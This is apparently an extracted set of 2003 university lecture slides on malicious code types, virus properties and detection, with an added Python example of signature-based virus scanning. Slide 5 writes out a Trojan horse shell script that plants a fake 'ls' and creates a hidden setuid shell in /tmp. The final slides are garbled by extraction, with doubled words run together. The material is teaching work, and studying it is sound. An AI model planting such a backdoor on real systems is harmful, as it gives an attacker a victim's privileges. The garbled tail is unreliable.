
Malicious Code / Vulnerability Analysis / Intrusion Detection
Lecture 11, INFSCI 2935: Introduction to Computer Security
November 13, 2003
Courtesy of Professors Chris Clifton & Matt Bishop

Slide outline: What is Malicious Code?; Types of Malicious Code; Trojan Horse; Propagation; Virus; Virus Types; Virus Types/Properties; Worms; Other forms of malicious logic; What do we Do?; We can’t detect it: Now what?; Detection; Defense; Vulnerability Analysis; Techniques for Detecting Vulnerabilities; System Verification; Penetration Testing; Types/layers of Penetration Testing; Red Team Approach; Flaw Hypothesis Methodology; Problems with Penetration Testing; Vulnerability Classification; Example flaw: xterm log; Example: Finger Daemon (exploited by Morris worm); Vulnerability Classification: Generalize; RISOS: Research Into Secure Operating Systems (Seven Classes); Protection Analysis Model Classes; PA flaw classes; NRL Taxonomy; NRL Taxonomy (Genesis); NRL Taxonomy: Time; NRL Taxonomy: Location; Aslam’s Model; Common Vulnerabilities and Exposures (cve.mitre.org); Buffer Overflow; Intrusion Detection/Response; Intrusion Detection; IDS Types: Anomaly Detection; Anomaly Detection: How do we determine normal?; IDS Types: Misuse Modeling; Specification Modeling; IDS Systems; IDS Architecture; Where is the Agent?; IDS Problem; Intrusion Response; Containment; Eradication; Follow-Up

Slide 2: What is Malicious Code?
- Set of instructions that causes a security policy to be violated
  - Is an unintentional mistake that violates policy malicious code?
  - (Tricked into doing that?)
  - What about “unwanted” code that doesn’t cause a security breach?
- Generally relies on “legal” operations
  - Authorized user could perform operations without violating policy
  - Malicious code “mimics” authorized user

Slide 3: Types of Malicious Code
- Trojan Horse: trick user into executing malicious code
- Virus: replicates and inserts itself into fixed set of files
- Worm: copies itself from computer to computer

Slide 4: Trojan Horse
- Program with an overt (expected) and covert (unexpected) effect
  - Appears normal/expected
  - Covert effect violates security policy
- User tricked into executing Trojan horse
  - Expects (and sees) overt behavior
  - Covert effect performed with user’s authorization
- Trojan horse may replicate
  - Create copy on execution
  - Spread to other users/systems

Slide 5: Propagation
- Perpetrator:

    cat >/homes/victim/ls <<eof
    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*
    eof

- Victim:

    ls

- It is a violation to trick someone into creating a shell that is setuid to themselves
- How to replicate this?

Slide 6: Virus
- Self-replicating code
  - A freely propagating Trojan horse
  - Some disagree that it is a Trojan horse
- Inserts itself into another file
  - Alters normal code with “infected” version
- Operates when infected code executed:

    If spread condition then
      For target files
        if not infected then alter to include virus
    Perform malicious action
    Execute normal program

Slide 7: Virus Types
- Boot Sector Infectors (The Brain Virus)
  - Problem: How to ensure virus “carrier” executed?
  - Solution: Place in boot sector of disk
    - Run on any boot
  - Propagate by altering boot disk creation
  - Less common with few boots off floppies
- Executable infector (The Jerusalem Virus, Friday 13th, not 1987)
  - Malicious code placed at beginning of legitimate program (.COM, .EXE files)
  - Runs when application run
  - Application then runs normally
- Multipartite virus: boot sector + executable infector

Slide 8: Virus Types/Properties
- Terminate and Stay Resident
  - Stays active in memory after application complete
  - Allows infection of previously unknown files
    - Trap calls that execute a program
  - Can be boot sector infectors or executable infectors (Brain and Jerusalem)
- Stealth (an executable infector)
  - Conceal infection
    - Trap read to provide disinfected file
    - Let execute call infected file
- Encrypted virus
  - Prevents “signature” to detect virus
  - [Deciphering routine, Enciphered virus code, Deciphering key]
- Polymorphism
  - Change virus code to something equivalent each time it propagates

Slide 9: Virus Types/Properties
- Macro Virus
  - Composed of a sequence of instructions that is interpreted rather than executed directly
  - Infected “executable” isn’t machine code
  - Relies on something “executed” inside application data
  - Example: Melissa virus infected Word 97/98 docs
- Otherwise similar properties to other viruses
  - Architecture-independent
  - Application-dependent
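The encrypted-virus layout on slide 8 ([deciphering routine, enciphered virus code, deciphering key]) is the reason a plain byte signature on the virus body fails, and the reason scanners instead match the deciphering routine, which an encrypted (but not polymorphic) virus carries unchanged in every copy, and then decipher the rest of the file before re-applying the body signature. The following Python script is an added example and is not code from the lecture; the stub marker DECRYPTOR_STUB, the toy single-byte XOR cipher, the BODY string and the host-file bytes are all constructed for illustration and contain nothing executable.

```python
# Added example: three detection layers run against a constructed
# "encrypted virus" layout [deciphering routine][key][enciphered body].
# All bytes below are constructed and harmless; no real malware is involved.

DECRYPTOR_STUB = b"\xde\xc0\xde\x01"   # constructed stand-in for the deciphering routine
BODY = b"TOY-VIRUS-BODY-SIGNATURE"     # constructed stand-in for the plaintext virus code
BENIGN_HEAD = b"benign-header:"        # constructed host-file content around the infection
BENIGN_TAIL = b":benign-trailer"


def xor_bytes(data: bytes, key: int) -> bytes:
    """Toy single-byte XOR cipher standing in for the virus's encipher/decipher routine."""
    return bytes(b ^ key for b in data)


def make_plain_sample() -> bytes:
    """Host file infected by an unencrypted virus: the body is visible as-is."""
    return BENIGN_HEAD + BODY + BENIGN_TAIL


def make_encrypted_sample(key: int) -> bytes:
    """Host file infected by an encrypted virus: constant stub, key byte, enciphered body."""
    return BENIGN_HEAD + DECRYPTOR_STUB + bytes([key]) + xor_bytes(BODY, key) + BENIGN_TAIL


def scan(sample: bytes) -> dict:
    """Run three detection layers and report which ones fire.

    body_signature:      naive byte match on the plaintext body (defeated by encryption)
    decryptor_signature: match on the deciphering routine, which stays constant
                         across copies of an encrypted virus
    body_after_decipher: once the stub is found, read the key byte that follows it,
                         decipher the remainder of the file and re-apply the body signature
    """
    result = {
        "body_signature": BODY in sample,
        "decryptor_signature": DECRYPTOR_STUB in sample,
        "body_after_decipher": False,
    }
    idx = sample.find(DECRYPTOR_STUB)
    if idx != -1 and idx + len(DECRYPTOR_STUB) < len(sample):
        key_pos = idx + len(DECRYPTOR_STUB)
        key = sample[key_pos]
        deciphered = xor_bytes(sample[key_pos + 1:], key)
        result["body_after_decipher"] = BODY in deciphered
    return result


if __name__ == "__main__":
    for label, sample in (("plain", make_plain_sample()),
                          ("encrypted", make_encrypted_sample(0x5A))):
        print(label, scan(sample))
```

Against the plain sample only the body signature fires; against the encrypted sample the body signature misses, the stub signature hits, and deciphering with the embedded key recovers the body. Polymorphism, the next bullet on the slide, changes the deciphering routine itself on every propagation, so the constant-stub layer is lost as well and the scanner has nothing stable left to match statically.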
10WormsWormsReplicates from one computer to anotherReplicates from one computer to anotherSelf-replicating: No user action requiredVirus: User performs “normal” actionTrojan horse: User tricked into performing actionCommunicates/spreads using standard Communicates/spreads using standard protocolsprotocolsINFSCI 2935: Introduction to Computer Security 11Other forms of malicious logicOther forms of malicious logicWe’ve discussed how they propagateWe’ve discussed how they propagateBut what do they do?Rabbits/BacteriaRabbits/BacteriaExhaust system resources of some classDenial